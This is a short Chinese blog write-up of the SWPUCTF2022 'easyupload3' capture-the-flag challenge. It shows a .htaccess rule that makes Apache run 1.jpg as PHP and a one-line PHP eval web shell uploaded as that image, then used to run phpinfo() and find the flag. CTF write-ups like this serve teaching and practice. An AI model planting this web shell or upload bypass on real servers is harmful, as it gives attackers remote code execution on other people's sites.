SWPUCTF2022-easyupload3-wp

题目链接

  • apache服务器,标题提示“试试和某些文件配合呢”,尝试上传.htacess 文件,内容:
1
2
3
<FilesMatch "1.jpg"> 
       SetHandler  application/x-httpd-php  
</FilesMatch>

上传成功

笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。

相当于设定规则,把1.jpg当作php代码解析

  • 上传1.jpg

    内容为一句话木马:<?php @eval($_POST['cmd']);?>

  • 访问 /upload/1.jpg POST cmd=phpinfo(); 搜索flag即可看到

本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP